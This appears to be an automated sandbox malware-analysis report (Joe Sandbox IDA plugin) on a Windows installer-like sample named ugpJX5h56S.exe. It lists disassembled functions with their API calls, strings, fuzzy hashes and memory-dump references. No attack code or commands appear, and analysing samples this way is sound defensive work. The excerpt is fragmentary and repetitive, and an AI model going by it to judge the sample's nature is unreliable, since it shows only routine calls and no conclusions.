Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18

Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
GetDlgItem.USER32(?,000003E8), ref: 00404731
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
GetSysColor.USER32(?), ref: 0040475F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
lstrlenW.KERNEL32(?), ref: 00404780
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
GetDlgItem.USER32(?,0000040A), ref: 004047FB
SendMessageW.USER32(00000000), ref: 00404802
GetDlgItem.USER32(?,000003E8), ref: 0040482D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
SetCursor.USER32(00000000), ref: 00404881
LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
SetCursor.USER32(00000000), ref: 0040489D
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE

Strings

N, xrefs: 0040481B
: Completed, xrefs: 0040485C

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4

Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB

Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8

GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
wsprintfA.USER32 ref: 00406206
GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
GlobalFree.KERNEL32(00000000), ref: 004062EF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Strings

%ls=%ls, xrefs: 004061FC
[Rename], xrefs: 00406270, 00406282

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD

Function 004067EF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ugpJX5h56S.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
CharNextW.USER32(?,"C:\Users\user\Desktop\ugpJX5h56S.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

Strings

*?|<>/":, xrefs: 00406841
C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
"C:\Users\user\Desktop\ugpJX5h56S.exe", xrefs: 00406833

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ugpJX5h56S.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-506753964
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD

Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404544
GetSysColor.USER32(00000000), ref: 00404582
SetTextColor.GDI32(?,00000000), ref: 0040458E
SetBkMode.GDI32(?,?), ref: 0040459A
GetSysColor.USER32(?), ref: 004045AD
SetBkColor.GDI32(?,?), ref: 004045BD
DeleteObject.GDI32(?), ref: 004045D7
CreateBrushIndirect.GDI32(?), ref: 004045E1

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1

Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D

Strings

9, xrefs: 00402760

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58

Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
GetMessagePos.USER32 ref: 00404E9E
ScreenToClient.USER32(?,?), ref: 00404EB8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0

Strings

f, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4

Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E76
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
ReleaseDC.USER32(?,00000000), ref: 00401EA9
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8

Strings

Tahoma, xrefs: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C

Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(000E010D,00000064,000E0A30), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

verifying installer: %d%%, xrefs: 0040300B

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58

Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
GlobalFree.KERNEL32(?), ref: 00402A2B
GlobalFree.KERNEL32(00000000), ref: 00402A3E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8

Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
